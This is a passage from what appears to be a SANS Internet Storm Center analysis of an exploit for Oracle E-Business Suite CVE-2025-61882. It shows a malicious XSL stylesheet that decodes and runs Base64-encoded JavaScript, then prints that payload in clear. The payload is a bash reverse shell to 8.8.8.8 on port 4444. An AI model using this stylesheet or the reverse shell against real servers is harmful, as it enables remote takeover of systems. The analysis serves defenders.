        <xsl:template match="/">
            <xsl:variable name="bs" select="b64:decodeBuffer(b64:new(),'CiAgICB2YXIgc3RyaW5nYyA9IGphdmEubGFuZy5DbGFzcy5mb3JOYW1lKCdqYXZhLmxhbmcuU3RyaW5nJyk7CiAgICB2YXIgY21kcyA9ICBqYXZhLmxhbmcucmVmbGVjdC5BcnJheS5uZXdJbnN0YW5jZShzdHJpbmdjLDMpOwogICAgamF2YS5sYW5nLnJlZmxlY3QuQXJyYXkuc2V0KGNtZHMsMCwnc2gnKTsKICAgIGphdmEubGFuZy5yZWZsZWN0LkFycmF5LnNldChjbWRzLDEsJy1jJyk7CiAgICBqYXZhLmxhbmcucmVmbGVjdC5BcnJheS5zZXQoY21kcywyLCdiYXNoIC1pID4mIC9kZXYvdGNwLzguOC44LjgvNDQ0NCAwPiYxJyk7CiAgICBqYXZhLmxhbmcuUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYyhjbWRzKTsKICAgIDEKICAgICAgICA=')"/>
            <xsl:variable name="js" select="str:new($bs)"/>
            <xsl:variable name="m" select="jsm:new()"/>
            <xsl:variable name="e" select="jsm:getEngineByName($m, 'js')"/>
            <xsl:variable name="code" select="eng:eval($e, $js)"/>
            <xsl:value-of select="$code"/>
        </xsl:template>
    </xsl:stylesheet>

 

The Base64 encoded part includes the user configurable command to execute:

    var stringc = java.lang.Class.forName('java.lang.String');
    var cmds =  java.lang.reflect.Array.newInstance(stringc,3);
    java.lang.reflect.Array.set(cmds,0,'sh');
    java.lang.reflect.Array.set(cmds,1,'-c');
    java.lang.reflect.Array.set(cmds,2,'bash -i >& /dev/tcp/8.8.8.8/4444 0>&1');
    java.lang.Runtime.getRuntime().exec(cmds);
    1

 

For the Windows version of the exploit, cmd /c is used instead of sh -c.

Note that the request referenced in exp.py requests "/OA_HTML/help/../ieshostedsurvey.jsp", not the .xsl stylesheet. I can only guess at this point that there may be a request triggered to translate the .jsp file, which may be related to the SSRF issue. Maybe someone else has a better idea, or more insight into how the app server works.

[1] https://www.oracle.com/security-alerts/alert-cve-2025-61882.html
[2] https://www.virustotal.com/gui/file/aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121
[3] https://www.virustotal.com/gui/file/6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b/community

--
Johannes B. Ullrich, Ph.D., Dean of Research, SANS.edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.